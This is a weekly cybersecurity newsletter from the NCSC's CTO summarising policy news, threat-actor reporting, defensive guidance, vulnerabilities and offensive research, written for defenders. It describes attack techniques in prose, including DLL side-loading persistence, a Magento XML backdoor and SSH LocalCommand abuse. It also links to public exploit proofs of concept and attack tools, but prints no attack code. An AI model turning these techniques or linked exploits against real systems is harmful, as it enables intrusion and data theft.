CTO at NCSC Summary: week ending April 14th
Vulnerabilities in security products continue to burn..
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week ransomware continues to bite and vulnerabilities in security products continue to burn..
In the high-level this week:
Cyber Security Breaches Survey 2024 - UK Department for Science, Innovation and Technology - “By far the most common type of breach or attack is phishing (84% of businesses and 83% of charities). This is followed, to a much lesser extent, by others impersonating organisations in emails or online (35% of businesses and 37% of charities) and then viruses or other malware (17% of businesses and 14% of charities).”
Secure connected places playbook - UK Department for Science, Innovation and Technology - Resources to help local authorities (Government) secure their connected places ("smart cities") against cyber threats. This is the updated beta release.
The Cyber National Mission Force conducts missions to counter malicious cyberspace activities - US DoD - “supporting all aspects of our defend-the-nation mission set. CNMF personnel have deployed 22 times to 17 countries in partner-enabled, hunt forward operations that constrained adversary freedom of maneuver.”
ED 24-02: Mitigating the Significant Risk from Nation-State Compromise of Microsoft Corporate Email System - CISA - “Affected agencies that receive from Microsoft email metadata corresponding to known or suspected authentication compromises or become aware of specific details of such compromises shall take the following actions:
Take immediate remediation action for tokens, passwords, API keys, or other authentication credentials known or suspected to be compromised.”
Cyber Security Behaviour Tracker 2024 - Cert NZ - “In April 2022, CERT NZ conducted research to achieve a comprehensive measure of New Zealanders’ cyber security attitudes and behaviours.. Building on this insight, a 2023 survey was conducted to track how New Zealanders’ cyber security attitudes and behaviours are changing over time.”
Russia is trying to sabotage European railways, warns Prague - Financial Times reports - “České dráhy said it had “seen an increased number of cyber attacks on our digital infrastructure” and was “continuously strengthening” its cyber security.”
Project Agorá: central banks and banking sector embark on major project to explore tokenisation of cross-border payments - Bank for International Settlements - “The project builds on the unified ledger concept proposed by the BIS and will investigate how tokenised commercial bank deposits can be seamlessly integrated with tokenised wholesale central bank money in a public-private programmable core financial platform. This could enhance the functioning of the monetary system and provide new solutions using smart contracts and programmability, while maintaining its two-tier structure. “
Consultation on the Draft Cyber Industrial Strategy - Irish Government - “the NCSC (Ireland) undertook extensive consultation, inclusive of 19 structured interviews and 3 online workshops. This public consultation document seeks views from knowledgeable members of the public and stakeholders in cyber security and forms the next stage in the Strategy development.”
Lloyds Bank axes risk staff after executives complain they are a ‘blocker’ - reports the Financial Times - “less than half our workforce believe intelligent risk-taking is encouraged”.
EU Parliament votes to strengthen GDPR enforcement - EuroActiv reports - “The amendments to the GDPR Enforcement Procedures Regulation aim to enhance complainants’ rights, clarify enforcement procedures, and address procedural concerns, which German MEP and rapporteur Sergey Lagodinsky of the Greens said will bring legal clarity.” - legal text.
Ukrainian Hackers Launch Cyberattacks on Moscow Sewage System - Kyiv Post reports - “The Ukrainian intelligence-affiliated hacker group said they managed to shut off 87,000 sensors and prevent the utility company from responding to accidents and emergency events.” - this is the cyber dimension of modern conflict.
Unauthorized access to local government systems and vendor responsibilities Maebashi Judgment 5.2.17 (Ordinance 2 Wa 145) - from Japan report by Hatena - “A case in which a vendor was found to have been grossly negligent in an incident in which personal information was suspected to have leaked from a local government due to unauthorized access caused by a vulnerability caused by incorrect firewall settings.”
Crypto assets: Market structures and EU relevance - European Securities and Markets Authority - “Trading volumes are highly concentrated in a few crypto exchanges: Ten exchanges process about 90% of trades, and the largest exchange alone accounts for almost half of global trading volumes.”
Annual Report 2023: adaptability in a changing world - from the European Data Protection Supervisor - “The EDPS Annual Report 2023 presents the institution's demonstrated adaptability in the face of an evolving digital and regulatory landscape. The Report summarises key actions in the areas of Supervision & Enforcement, Policy & Consultation and Technology & Privacy. “
Vesuvius - Trading Update which quantifies the cost of a breach - “This good performance has been achieved despite the impact of the cyber incident that occurred earlier in the year, which we expect to have a cost impact of c. £3.5m.”
Defending Democracy
A new approach to the fight against disinformation - Ministry of Digitization in Poland reports - including “Shifting the focus from content analysis to behavioral patterns will allow for a more effective assessment of the scale of the phenomenon. The set of countermeasures will also be expanded; “
EU political parties promise to steer clear of deepfakes ahead of election - Politico reports
Reporting on/from China
People's Daily Harmony: Actively participate in and lead the global governance of artificial intelligence - China outlines its ambitions - “As a major country in artificial intelligence, China has the confidence and ability to further participate and play a leading role, work with all parties to uphold the concept of extensive consultation, joint contribution and shared benefits, work together to jointly promote artificial intelligence governance, and promote the reform of the global governance system in the right direction.”
2024 China-Africa Internet Development and Cooperation Forum Chairman’s Statement on China-Africa Artificial Intelligence Cooperation - “The 2024 China-Africa Internet Development and Cooperation Forum was held in Xiamen, China, from April 2 to 3, 2024, and conducted in-depth exchanges on China-Africa cooperation in artificial intelligence.”
China removes foreign ownership restrictions on more value-added telecom services - Geotechnopolitics reports - “On April 10, 2024, the Ministry of Industry and Information Technology issued the "Notice on Conducting Pilot Work for Further Opening Up the Value-Added Telecommunications Services" (referred to as Document No. 107). According to Document No. 107, restrictions on foreign ownership in value-added telecommunications services such as cloud services, internet access, data processing, and app stores will be lifted in pilot areas of Beijing, Shanghai, Hainan, and Shenzhen.”
Hainan's first "Satellite Super Factory" project is accelerated, - IT Home reports - “The factory is different from the satellites developed in the past. The main reason is that it is a batch production feature, and its annual production capacity can reach 1,000 satellites.”
Artificial intelligence
Laying the groundwork for US-China AI dialogue - The Brookings Institution - “The dialogue has demonstrated it is possible for U.S. and Chinese experts to narrow differences and puncture myths about each side’s approach to the employment of AI in national security. Both sides have developed shared understandings, for example, that the use of AI-enabled weapons systems should comport with the principles of customary and international law, particularly the principles of distinction and proportionality.”
IA : notre ambition pour la France - French Government - AI: our ambition for France
Cyber proliferation
Polish gov’t to notify some 30 people targeted by spyware - TVP World reports - “The Polish justice minister has announced that around 30 individuals are to be notified that they were surveilled by Pegasus spyware during the previous Law and Justice (PiS)-dominated government.”
Price of zero-day exploits rises as companies harden products against hackers - reports TechCrunch - … “is now offering between $5 million and $7 million for zero-days to break into iPhones; up to $5 million for zero-days to break into Android phones; up to $3 million and $3.5 million for Chrome and Safari zero-days, respectively; and $3 million to $5 million for WhatsApp and iMessage zero-days”
NSO Group embroiled in Paris-Baku information wars - reports Intelligence Online - ”The French ambassador to Armenia has again been the target of a disinformation campaign. A screenshot obtained by us indicates his phone may have been hacked by Israeli NSO Group's Pegasus spyware. This destabilisation operation forms part of a broader stand-off between France and Azerbaijan.”
NSO Transparency And Responsibility Report 2023 - from December 31st, 2023 - but worth a read.
NSO Group's 2023 Irresponsibility Report - An analysis of the above.
Israel Tried to Keep Sensitive Spy Tech Under Wraps. It Leaked Abroad - “The digital surveillance corporation Intellexa, which is owned by the former Israeli intelligence officer Tal Dilian, showcased a sensitive spying product that makes it possible to infect mobile phones like iPhones or Androids through online advertisements alone, according to documents seen by Haaretz and journalists in Greece.”
Challenges commercial surveillance vendors and exploit vendors are facing - how it looks from their side
Bounty Hunting
Our Commitment to Security: An Open Letter from Ivanti CEO Jeff Abbott - this is their Bill Gates: Trustworthy Computing memo. One might infer they have felt the business effects which has prompted this very public display.
No reflections this week..
Think someone else would benefit? Share:
All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.
Have a lovely Friday..
Ollie
Cyber threat intelligence
Who is doing what to whom and how allegedly.
Reporting on Russia
Turla APT Targets Albania With Backdooor in Ongoing Campaign to Breach European Organizations
Aleksander W. Jarosz provides some high-level reporting here on alleged Russian interest. Insight it mostly victimology.
The targeting of Albania aligns with the regional interests of the APT campaign first described mid-February. This new activity provides additional intelligence into the possible scope of Russia-based APT operations, which has also included Poland in this campaign.
Reporting on China
Cyberespionage Group Earth Hundun's Continuous Refinement of Waterbear and Deuterbear
Cyris Tseng and Pierre Lee provide reporting on an alleged Chinese threat actor who shows a degree of technical sophistication in their operations. The defense evasion in this report is of note.
Earth Hundun is a cyberespionage-motivated threat actor that has been active for several years in the Asia-Pacific region, targeting the technology and government sectors.
The group has been known for employing several tools and techniques, including Waterbear, a malware entity that has had over 10 versions since 2009.
Waterbear is known for its complexity, as it uses a number of evasion mechanisms to minimize the chance of detection and analysis. Succeeding versions have added enhancements that make it even more troublesome to deal with.
In 2022, Earth Hundun began using the latest version of Waterbear — also known as Deuterbear — which has several changes, including anti-memory scanning and decryption routines, that make us consider it a different malware entity from the original Waterbear.
https://www.trendmicro.com/en_us/research/24/d/earth-hundun-waterbear-deuterbear.html
China tests US voter fault lines and ramps AI content to boost its geopolitical interests
Clint Watts provides reporting on alleged Chinese information operations. The scale is of note.. .
There has been an increased use of Chinese AI-generated content in recent months, attempting to influence and sow division in the U.S. and elsewhere on a range of topics including: the train derailment in Kentucky in November 2023, the Maui wildfires in August 2023, the disposal of Japanese nuclear wastewater, drug use in the U.S. as well as immigration policies and racial tensions in the country. There is little evidence these efforts have been successful in swaying opinion.
China’s geopolitical priorities remain unchanged but it has doubled down on its targets and increased the sophistication of its influence operations (IO) attacks. These priorities are:
The South Pacific islands
The South China Sea region
The U.S. defense industrial base
Messages between Chinese hackers show Australian Strategic Policy Institute is a target
James King of of Australian publication The Nightly alleges Chinese interest and tasking of an alleged Chinese APT to go after ASPI. This should serve as a warning to similar institutions globally..
Chinese spymasters have identified Australia’s top security research institute as a priority target in their cyber-attack operations, with an investigation by The Nightly for the first time able to reveal messages between hackers that refer to our nation.
The group chat exchanges also offer a remarkable insight into the daily lives and frustrations of state-sponsored hackers working for China, including their dismay at being told they’re working too slowly while being tasked with disrupting “a big asset in two days”.
The Nightly investigation can reveal hackers working for the Chinese Government have been directed to target the Australian Strategic Policy Institute.
Withdrawing funding for the institute was among 14 demands to the Australian Government released by the Chinese embassy in 2020.
But The Nightly has discovered group chat messages on a social media channel exchanged between a hacker collective working for the Chinese Government.
The messages reveal a target list that includes ASPI — a think tank partly funded by Australia’s Department of Defence — among a range of other governmental organisation across the US and Taiwan.
The VPN installation package "leads the wolf into the house": the secret theft operation of the suspected Golden Eyed Dog (APT-Q-27) gang
Chinese reporting on malicious software being distributed to go after gambling. Phishing appears to be used historically by this threat actor. Note the other initial access mechanisms that are also used by this threat actor.
Golden Eye Dog is a hacker group that targets people engaged in gambling, dog pushing, and overseas Chinese groups in Southeast Asia. Its business scope covers remote control, mining, DDoS attacks, etc.
Attackers often spread these malicious applications and download links through various channels, such as search engine optimization or social media.
[We] discovered a malicious installation package disguised as Kuailian VPN during daily analysis and operation. After the installation package is run, in addition to releasing the Kuailian VPN installation software with normal signatures, it will also secretly implant a customized version of gh0st remote.
Reporting on North Korea
United Nations alleged that $3 billion of operations by North Korean in six years to fund weapons. This has been heavily reported previously, this is the aggregate reporting by the UN. Also shows that when financial sanctions bite some entities will adapt and overcome.
The Panel is investigating 58 suspected cyberattacks by the Democratic People’s Republic of Korea on cryptocurrency-related companies between 2017 and 2023, valued at approximately $3 billion, which reportedly help to fund the country’s development of weapons of mass destruction.
https://documents.un.org/doc/undoc/gen/n24/032/68/pdf/n2403268.pdf?token=MhrpbBFJJ1SPcyqqMp&fe=true
Reporting on Iran
Boggy Serpens use AutodialDLL function
Brad Duncan releases a TTP for this alleged Iranian threat actor. Of note is that Iran appears to continue to co-opt techniques details by red teamers in their offensive operations.
This Boggy Serpens activity appears to be based on an attack method documented by the Atomic Red Team
The AutodialDLL technique has been used for persistence in the wild by other threat actors.
But in this case, Boggy Serpens is AutodialDLL to side-load the malicious DLL but relying on a scheduled task for persistence.
Persistence established through a scheduled task.
The scheduled task uses PowerShell commands to abuse the AutodialDLL technique.
PowerShell commands first update the AutodialDLL value in the Windows Registry, setting it to the malicious DLL.
PowerShell commands then side-load the malicious DLL by opening a hidden Internet Explorer window.
PowerShell commands finally reset the AutodialDLL value to its default settings to avoid other processes side-loading the DLL again.
The process repeats the next time the scheduled task runs.
Reporting on Other Actors
APT-C-43 (Machete) organization suspected of evolving into more diversified
Unattributed threat actor reporting from China on a Spanish speaking APT. The use of fake blogs in their tradecraft is of note..
It mainly conducts initial attacks through social engineering, using phishing emails or fake blogs.
The payload delivery method of the APT-C-43 organization has not changed significantly. It is mainly delivered through spear phishing emails and fake blogs. The phishing emails contain Office documents carrying malicious macro codes. After the macro codes are enabled, FTP will be initiated. Requests a backdoor Trojan to be downloaded from a remote server and run.
Starry Addax targets human rights defenders in North Africa with new malware
Unattributed threat actor here using social engineering to execute their mobile operations. The implant also has anti-emulations checks which are of note.
[We are] disclosing a new threat actor we deemed “Starry Addax” targeting mostly human rights activists associated with the Sahrawi Arab Democratic Republic (SADR) cause with a novel mobile malware.
Starry Addax conducts phishing attacks tricking their targets into installing malicious Android applications we’re calling “FlexStarling.”
For Windows-based targets, Starry Addax will serve credential-harvesting pages masquerading as login pages from popular media websites.
Starry Addax’s infrastructure can be used to target Windows- and Android-based users. This campaign's infection chain begins with a spear-phishing email sent to targets, consisting of individuals of interest to the attackers, especially human rights activists in Morocco and the Western Sahara region. The email contains content that requests the target to install the Sahrawi News Agency’s Mobile App or include a topical theme related to the Western Sahara.
https://blog.talosintelligence.com/starry-addax/
Muddled Libra’s Evolution to the Cloud
Margaret Zimmermann provides reporting on this criminal group also known as Scattered Spider. Note the targeting of administrators in institutions..
[We] have discovered that the Muddled Libra group now actively targets software-as-a-service (SaaS) applications and cloud service provider (CSP) environments.
Organizations often store a variety of data in SaaS applications and use services from CSPs. The threat actors have begun attempting to leverage some of this data to assist with their attack progression, and to use for extortion when trying to monetize their work.
Muddled Libra also uses the legitimate scalability and native functionality of CSP services to create new resources to assist with data exfiltration.
..
Muddled Libra purposefully targets administrative users during their social engineering attacks since those users have elevated permissions within identity providers, SaaS applications and organizations’ various CSP environments. After initial access, the group exploits identity providers to perform privilege escalation, by bypassing IAM restrictions and modifying permission sets associated with users to increase their scope of access.
https://unit42.paloaltonetworks.com/muddled-libra-evolution-to-cloud/
Smoke and (screen) mirrors: A strange signed backdoor
Andreas Klopsch shows that some actors were last year able to get malicious code signed through Microsoft processes.
The first variant contains a compilation time of 2023-01-05. We therefore assess that this campaign has been in development since at least January 2023
The second variant contains a compilation timestamp of 2023-01-11. This is also the first sample that managed to obtain a WHCP certificate
The third group of samples, with a compilation timestamp of 2023-03-19, were either signed by the WHCP certificate, or unsigned. Some of these samples are associated with the Laixi_Update_1.0.6.7_b.exe file mentioned above
The final group shares a compilation timestamp of 2023-10-08. Interestingly, two samples of this group were signed by a different signer, although as of this writing we haven’t been able to ascertain any further information on these signers, or identify any other samples signed by them.
https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/
The New Version Of JsOutProx Is Attacking Financial Institutions In APAC And MENA Via GitLab Abuse
Criminal targeting of the financial sector in the middle-east. Phishing is the initial access vector.
[We] detected a new version of JSOutProx, targeting financial services and organizations in the APAC and MENA regions. JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET. It employs the .NET (de)serialization feature to interact with a core JavaScript module running on the victim's machine. Once executed, the malware enables the framework to load various plugins, which conduct additional malicious activities on the target.
The spike in this activity was identified around February 8, 2024, when a major system integrator based in the Kingdom of Saudi Arabia reported an incident targeting customers of one of their major banks regional banks.
The actors employed a fake SWIFT payment notification (for enterprise customers) and a Moneygram template (for private customers), using misleading notifications to confuse victims and execute malicious code.
Persistent Magento backdoor hidden in XML
Criminal novel persistent technique here. Shows a degree of lateral thinking / novelty and a reminder that persistence can happen through data.
Attackers combine the Magento layout parser with the
beberlei/assertpackage (installed by default) to execute system commands. Because the layout block is tied to the checkout cart, this command is executed whenever<store>/checkout/cartis requested. In this case, the command is sed, which adds a backdoor to the (automatically generated) CMS controller.
https://sansec.io/research/magento-xml-backdoor
It Was Not Me! Malware-Initiated Vulnerability Scanning Is on the Rise
Beliz Kaleli, Fang Liu, Peng Peng, Alex Starov, Joey Allen and Stefan Springer provide some trend reporting which is of note if not a revelation.
Our telemetry indicates a growing number of threat actors are turning to malware-initiated scanning attacks. This article reviews how attackers use infected hosts for malware-based scans of their targets instead of the more traditional approach using direct scans.
https://unit42.paloaltonetworks.com/malware-initiated-scanning-attacks/
Malvertising
Gets its own little sub heading this week
Help us to take down the parasite website
A plea from an open source project..
https://notepad-plus-plus.org/news/help-to-take-down-parasite-site/
Active Nitrogen campaign delivered via malicious ads for PuTTY, FileZilla
Jérôme Segura also highlights the challenge..
In the past couple of weeks, we have observed an ongoing campaign targeting system administrators with fraudulent ads for popular system utilities. The malicious ads are displayed as sponsored results on Google’s search engine page and localized to North America.
Victims are tricked into downloading and running the Nitrogen malware masquerading as a PuTTY or FileZilla installer. Nitrogen is used by threat actors to gain initial access to private networks, followed by data theft and the deployment of ransomware such as BlackCat/ALPHV.
We have reported this campaign to Google but no action has been taken yet.
Bing ad for NordVPN leads to SecTopRAT
Jérôme Segura again shows it isn’t just any one search engine.
We look at a very recent malvertising campaign impersonating the popular VPN software NordVPN. A malicious advertiser is capturing traffic from Bing searches and redirecting users to a decoy site that looks almost identical to the real one.
The threat actors went ever further by trying to digitally sign a malicious installer as if they were the official vendor. Victims will have the impression they are getting NordVPN as it is part of the package, but will also inadvertently install a Remote Access Trojan known as SecTopRAT on their computer.
We have reported the malicious Bing ad to Microsoft, and other parts of the distribution infrastructure to their respective provider. We want to reiterate that NordVPN is a legitimate VPN provider and they are being impersonated by threat actors.
https://www.malwarebytes.com/blog/threat-intelligence/2024/04/bing-ad-for-nordvpn-leads-to-sectoprat
Discovery
How we find and understand the latent compromises within our environments.
M365 OAuth Apps: Malicious OAuth App Detections
Phill Moore is building out a catalogue which be of use as it grows. Currently lists eight..
Detecting Command and Control frameworks via Sysmon and Windows Event Logging
Eric Conrad provides a walk through of the practice..
https://github.com/eric-conrad/c2-talk/
Exploring IPv6 Zone Identifier
Vsevolod Kokorin hints at the complexity in IPv6 parsers that we are going to have to contend with.
This article is dedicated to a series of tricks utilizing the modern capabilities of IPv6 and the shortcomings of address parser implementations in standard libraries of popular programming languages.
https://blog.slonser.info/posts/ipv6-zones/
PersistentJXA: Collection of macOS persistence methods in JXA
Leo Pitt and Matthew Conway provides some tooling/persistence techniques that if you run a macOS shop you will want to ensure coverage of.
MacOS Yosemite (10.10) introduced JXA. Its implementation allows users to control applications and the operating system using the JavaScript language. It can be invoked via
osascript, a compiled script (.scpt), or a compiled Application (.app). Additionally, it can be leveraged in OSAKit from within other macho binaries without spawning theosascriptbinary.
https://github.com/D00MFist/PersistentJXA
Unveiling malware behavior trends
Samir Bousseaden provides an analyses of a Windows dataset of over 100,000 malicious files. Some good hard data on the possible choke points..
https://www.elastic.co/security-labs/unveiling-malware-behavior-trends
Opening EXPMON for Everyone
Haifei provides the platform and their methodology in this release..
The core idea of EXPMON is that it runs the sandboxes based on a concept we call "environment binding." This is because exploits run very differently than malware. Exploits are highly dependent on the specific software environment; we can't examine exploits without considering the environment. For example, a .pdf exploit for Foxit Reader may not function as a working exploit on Adobe Reader. If you use a sandboxing environment with Adobe Reader to test the .pdf sample, you will miss out on the exploit. Sometimes, an exploit may target specific software versions and act normally on others.
https://justhaifei1.blogspot.com/2024/04/opening-expmon-for-everyone.html
https://pub.expmon.com/static/pdf/expmon_methodology_architecture.pdf
Defence
How we proactively defend our environments.
KB5025885: How to manage the Windows Boot Manager revocations for Secure Boot changes associated with CVE-2023-24932
Complex patch this..
IMPORTANT You should apply the Windows security update released on or after April 9, 2024, as part of your regular monthly update process.
This article applies to those organizations who should begin evaluating mitigations for a publicly disclosed Secure Boot bypass leveraged by the BlackLotus UEFI bootkit. Additionally, you might want to take a proactive security stance or to start to prepare for the rollout. Note that this malware requires physical or administrative access to the device.
CAUTION After the mitigation for this issue is enabled on a device, meaning the mitigations have been applied, it cannot be reverted if you continue to use Secure Boot on that device. Even reformatting of the disk will not remove the revocations if they have already been applied. Please be aware of all the possible implications and test thoroughly before you apply the revocations that are outlined in this article to your device.
Fighting cookie theft using device bound sessions
Kristian Monsen outlines Google’s possible approach to dealing with stealers..
We’re prototyping a new web capability called Device Bound Session Credentials (DBSC) that will help keep users more secure against cookie theft. The project is being developed in the open at github.com/WICG/dbsc with the goal of becoming an open web standard.
By binding authentication sessions to the device, DBSC aims to disrupt the cookie theft industry since exfiltrating these cookies will no longer have any value. We think this will substantially reduce the success rate of cookie theft malware. Attackers would be forced to act locally on the device, which makes on-device detection and cleanup more effective, both for anti-virus software as well as for enterprise managed devices.
https://blog.chromium.org/2024/04/fighting-cookie-theft-using-device.html
Strategies to monitor and prevent vulnerable driver attacks
Stefan Puzderca provides the Microsoft DART guide to this problem,
From a threat hunting perspective, it is important to understand what data sources are available and what coverage they have. Baselining the driver activity in the environment can greatly reduce the number of false positives in the hunts. The challenges encountered when conducting threat hunting for vulnerable drivers include: their presence in various legitimate locations, their potential to possess file extensions other than .sys, and the fact that even vulnerable drivers can exhibit seemingly convincing metadata. The following questions can guide threat hunting in identifying the vulnerable drivers:
Do old signed drivers correspond to any required business application
When was the driver signed
Where is the driver located
What process installed the driver
Is the driver metadata normal for the environment
NSA Issues Guidance for Maturing Data Security
From our partners at Forte Meade.
The recommendations in the Cybersecurity Information Sheet (CSI), “Advancing Zero Trust Maturity Throughout the Data Pillar,” are intended to ensure only those with authorization can access data.
Incident Writeups & Disclosures
How they got in and what they did.
Compromise of Sisense Customer Data
From our partners at CISA.
CISA urges Sisense customers to:
Reset credentials and secrets potentially exposed to, or used to access, Sisense services.
Investigate—and report to CISA—any suspicious activity involving credentials potentially exposed to, or used to access, Sisense services.
https://www.cisa.gov/news-events/alerts/2024/04/11/compromise-sisense-customer-data
Vulnerability
Our attack surface.
InSpectre Gadget
VUSec is the Systems and Network Security Group at Vrije Universiteit Amsterdam and they have performed some excellent validation work here which found the original mitigations wanting!
We present InSpectre Gadget, an in-depth Spectre gadget inspector that uses symbolic execution to accurately reason about exploitability of usable gadgets. Our tool performs generic constraint analysis and models knowledge of advanced exploitation techniques to accurately reason over gadget exploitability in an automated way.
We show that our tool can not only uncover new (unconventionally) exploitable gadgets in the Linux kernel, but that those gadgets are sufficient to bypass all deployed Intel mitigations. As a demonstration, we present the first native Spectre-v2 exploit against the Linux kernel on last-generation Intel CPUs, based on the recent BHI variant and able to leak arbitrary kernel memory at 3.5 kB/sec.
https://www.vusec.net/projects/native-bhi/
Command Injection and Backdoor Account in D-Link NAS Devices
2024, yes..
The described vulnerability affects multiple D-Link NAS devices, including models DNS-340L, DNS-320L, DNS-327L, and DNS-325, among others. The vulnerability lies within the
nas_sharing.cgiuri, which is vulnerable due to two main issues: a backdoor facilitated by hardcoded credentials, and a command injection vulnerability via thesystemparameter
https://github.com/netsecfish/dlink
CVE-2023-3454: Remote code execution in Brocade Fabric OS
Network device security..
Remote code execution (RCE)vulnerability in Brocade Fabric OS after v9.0 and before v9.2.0 could allow a remote unauthenticated attacker to execute arbitrary code and use this to gain root access to the switch.
YSA-2024-01: YubiKey Manager Privilege Escalation
Vulnerabilities in security products..
A security issue has been identified in YubiKey Manager GUI which could lead to unexpected privilege escalation on Windows. If a user runs the YubiKey Manager GUI as Administrator, browser windows opened by YubiKey Manager GUI may be opened as Administrator which could be exploited by a local attacker to perform actions as Administrator. Under this circumstance, some browsers like Edge for example, have additional mitigations to prevent opening as Administrator.
https://www.yubico.com/support/security-advisories/ysa-2024-01/
Malicious Framework Vulnerabilities
Illegal to use in the wild..
CVE-2024-30850: Remote code execution on CHAOS RAT via agent spoofing
Evan Ikeda finds a vulnerability in an implant framework..
An authenticated command injection vulnerability that can be chained with an XSS to execute commands on the RAT server.
https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/
CVE-2024-30851 Jasmin ransomware web panel path traversal
Evan Ikeda finds another vulnerability in an implant framework..
A pre-auth path traversal vulnerability in the Jasmin Ransomware web panel (CVE-2024-30851), allowing an attacker to deanonymize panel operators and dump decryption keys. Jasmin ransomware was observed in a recent TeamCity (CVE-2024-27198, CVE-2024-27199) exploitation campaign
https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc
Offense
Attack capability, techniques and trade-craft.
Raspberry Robin and its new anti-emulation trick
Defender clearly imposing cost..
The anti-emulation technique spotted in Arkei was a string comparaison between:
The computer name and “HAL9TH”
The username and “JohnDoe”
Indeed, in the “Windows Defender Emulator”, the Windows API function
GetComputerNamealways returnsHAL9THandGetUsernamethe stringJohnDoe.
https://harfanglab.io/en/insidethelab/raspberry-robin-and-its-new-anti-emulation-trick/
Graphspy – The Swiss Army Knife For Attacking M365 & Entra
Keanu Nys releases a capability we can expect to be used by threat actors in 3..2..
Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI
https://insights.spotit.be/2024/04/05/graphspy-the-swiss-army-knife-for-attacking-m365-entra/
https://github.com/RedByte1337/GraphSpy
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access
Alex Reid provides evidence once more why Shortcut files coming into an organisation via any source is likely a bad idea..
LocalCommand
Specifies a command to execute on the local machine after successfully connecting to the server. The command string extends to the end of the line, and is executed with the user’s shell. The following escape character substitutions will be performed: ‘%d’ (local user’s home directory), ‘%h’ (remote host name), ‘%l’ (local host name), ‘%n’ (host name as provided on the command line), ‘%p’ (remote port), ‘%r’ (remote user name) or ‘%u’ (local user name). This directive is ignored unless PermitLocalCommand has been enabled.
..
With this option we can specify commands to be executed by a cmd.exe process that is spawned as a child of ssh.exe. Interestingly, ssh.exe is able to spawn cmd.exe and execute commands even when it has been disabled via GPO
Exploitation
What is being exploited.
CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway
Fridays..
Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability.
https://security.paloaltonetworks.com/CVE-2024-3400
CVE-2024-1086: Universal local privilege escalation on Linux
Lau provides a key I suspect we will see widely used..
Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.
https://github.com/Notselwyn/CVE-2024-1086
CVE-2024-3273: D-Link NAS RCE Exploited in the Wild
Matthew Remacle provides details of in-the-wild exploitation.
Upon further analysis, it appears the number of vulnerable devices is much lower than initially reported. According to our friends at Censys, the number is closer to 5,500 devices.
https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild
Exploiting CVE-2024-21378 – Remote Code Execution in Microsoft Outlook
Rich Wolferd details a technique we can expect to be used by threat actors in 3..2..
In 2023 [we] discovered that Microsoft Outlook was vulnerable to authenticated remote code execution (RCE) via synced form objects. This blog will cover how we discovered CVE-2024-21378 and weaponized it by modifying Ruler, an Outlook penetration testing tool..
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
BOLT-based binary analysis tool to verify correctness of security hardening
Kristof Beyls makes a decent proposal to the llvm community, please support..
This RFC proposes building a static binary analyzer that can scan binaries to
verify that a given hardening feature has been applied correctly across the
whole binary. I’ve built a prototype on top of BOLT and propose to improve it
enough to be able to upstream it. I will need help to do so succesfully.
Monocle
James Stevenson provides tooling which hints at real-world applications of LLMs in cyber security research..
Monocle is tooling backed by a large language model for performing natural language searches against compiled target binaries. Monocle can be provided with a binary and a search criteria (e.g., authentication code, vulnerable code, password strings, and more), and it will decompile the binary and use its in-built LLM to identify and score areas of the code that meet the criteria.
🔬 Binary Search: Without any prior knowledge, Monocle will support in answering binary analysis questions related to the target.
🤖 Natural Language and Open-Ended Questions: As Monocle is backed by an LLM queries passed to it are written in plain text.
🛠️ Ghidra Enabled: Monocle uses Ghidra headless to enable decompilation of compiled binaries!
https://github.com/user1342/Monocle
nimfilt
Marc-Etienne M.Léveillé and Alex provide this worse aid to reverse engineers..
A collection of modules and scripts to help with analyzing Nim binaries
https://github.com/eset/nimfilt
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
Demonstration of logical qubits and repeated error correction with better-than-physical error rates - “These results signify an important transition from noisy intermediate scale quantum computing to reliable quantum computing, and demonstrate advanced capabilities toward large-scale fault-tolerant quantum computing”
Bypassing Denuvo in Hogwarts Legacy - “The game collects hardware/software features into a fingerprint and generates a Steam Ticket (proof of game ownership).” - game hackers make really good vulnerability researchers.
Mobile Threat Intelligence Framework (MoTIF) Principles from the GSM Association
Artificial intelligence
Books
Nothing this week.
Events
2024 USCYBERCOM Legal Conference - videos available..
Programme du SSTIC 2024 - 5th to 7th June 2024 in France
Trusted Internet Summer School on Internet Governance and International Law - July 8-12, 2024 in Poland
Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.
You've got a broken link on that China-Africa piece..it's just http://Q You trying to tell us something Ollie? Like who you really are?